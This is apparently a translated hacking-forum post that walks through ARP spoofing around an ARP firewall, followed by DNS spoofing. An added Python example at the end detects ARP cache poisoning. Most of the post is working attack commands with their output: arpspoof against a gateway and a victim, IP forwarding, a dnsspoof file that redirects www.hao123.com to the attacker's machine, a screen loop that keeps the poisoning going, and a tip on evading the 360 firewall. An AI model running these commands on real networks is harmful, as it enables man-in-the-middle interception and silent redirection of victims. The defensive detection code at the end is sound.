SPOOF: A Simple Way Past an ARP Firewall
Dis9Team
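I had read some related documents earlier. I'm feeling a bit out of sorts tonight, the TzSec (天子安全) team members have all gone quiet, and it has been a long time since I wrote a joint article with 法客 (f4ck.net), so I'm using today's restlessness to put something together.
Read this reference first: http://sb.f4ck.net/forum.php?mod ... mp;page=1#pid146174
First, test whether DNS spoofing can succeed: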
- ~# netstat -r
- Kernel IP routing table
- Destination Gateway Genmask Flags MSS Window irtt Iface
- 5.5.5.0 * 255.255.255.0 U 0 0 0 eth0
- link-local * 255.255.0.0 U 0 0 0 eth0
- default 1.1.1.2 0.0.0.0 UG 0 0 0 eth0
- ~# arpspoof 1.1.1.2 -t 1.1.1.5   # terminal 1
- ~# arpspoof 1.1.1.5 -t 1.1.1.2   # terminal 2
- ~# echo 1 > /proc/sys/net/ipv4/ip_forward   # enable forwarding
- With the ARP firewall switched on, seeing it react counts as success
Now spoof DNS, sending packets non-stop:
- ~# cat baidu
- 1.1.1.4 www.hao123.com   # 1.1.1.4 is the local machine
- ~# dnsspoof -f baidu host 1.1.1.5 and udp port 53
- ~# cat send   # keep sending packets non-stop
- arpspoof 1.1.1.5 -t 1.1.1.2
- arpspoof 1.1.1.2 -t 1.1.1.5
- ~# screen ./send
- [1]+ Stopped screen ./send
- ~#screen ./send
- [2]+ Stopped screen ./send   # repeat this a few times and it goes through
- ~~~~~~~~~~~~~~~~
- ~~~~~~~~~~~~~~~~~~
- ~# screen -ls   # check the running sessions
- There are screens on:
- 3754.pts-7.TzSec Team (11/01/2012 12:21:47 AM) (Detached)
- 3750.pts-7.TzSec Team (11/01/2012 12:21:46 AM) (Detached)
- 3746.pts-7.TzSec Team (11/01/2012 12:21:44 AM) (Detached)
- 3742.pts-7.TzSec Team (11/01/2012 12:21:41 AM) (Detached)
- 3722.pts-4.TzSec Team (11/01/2012 12:21:21 AM) (Attached)
- 6 Sockets in /var/run/screen/S-root.
- ~#
- Next, switch over to the Windows machine
- ping www.hao123.com
- Pinging www.hao123.com [1.1.1.4] with 32 bytes of data:
- Reply from 1.1.1.4: bytes=32 time<1ms TTL=64
- Reply from 1.1.1.4: bytes=32 time<1ms TTL=64
For 360, disguising the source of the packets should be enough.
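Seen from the defending side, the two `arpspoof` commands above leave a trace in the ARP cache of 1.1.1.5: the gateway entry (1.1.1.2) changes, and one MAC address answers for more than one IP. The following is an added example, not part of the original post, that compares two cache snapshots for those two signs; the MAC addresses, the sample `arp -a` output and the function names are constructed for illustration.

```python
import re
from collections import defaultdict

# IPv4 address, then later on the same line a MAC written with ":" or "-".
ENTRY = re.compile(
    r"(\d{1,3}(?:\.\d{1,3}){3})\s.*?((?:[0-9a-fA-F]{2}[:-]){5}[0-9a-fA-F]{2})")

# Constructed samples: `arp -a` on 1.1.1.5 before and during poisoning (MACs invented).
BEFORE = """\
Interface: 1.1.1.5 --- 0x2
  Internet Address      Physical Address      Type
  1.1.1.2               00-11-22-33-44-02     dynamic
  1.1.1.4               00-11-22-33-44-04     dynamic
  1.1.1.255             ff-ff-ff-ff-ff-ff     static
"""
AFTER = """\
Interface: 1.1.1.5 --- 0x2
  1.1.1.2               00-11-22-33-44-04     dynamic
  1.1.1.4               00-11-22-33-44-04     dynamic
  1.1.1.255             ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""

def parse_table(text):
    """Return {ip: mac} from Windows `arp -a` or Linux `ip neigh` output."""
    table = {}
    for line in text.splitlines():
        m = ENTRY.search(line)
        if not m:
            continue  # header or blank line
        ip, mac = m.group(1), m.group(2).lower().replace("-", ":")
        if int(mac[:2], 16) & 1:  # group bit set: broadcast/multicast, not a host
            continue
        table[ip] = mac
    return table

def find_poisoning(before, after):
    """Compare two snapshots and return (changed, shared)."""
    old, new = parse_table(before), parse_table(after)
    # Sign 1: an IP that was already known now maps to a different MAC.
    changed = {ip: (old[ip], mac) for ip, mac in new.items()
               if ip in old and old[ip] != mac}
    # Sign 2: one unicast MAC is claimed by several IPs at the same time.
    by_mac = defaultdict(list)
    for ip, mac in new.items():
        by_mac[mac].append(ip)
    shared = {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}
    return changed, shared
```

On the constructed snapshots, `find_poisoning(BEFORE, AFTER)` reports the gateway 1.1.1.2 moving to the MAC that also owns 1.1.1.4, which is the pattern a static ARP entry for the gateway would prevent.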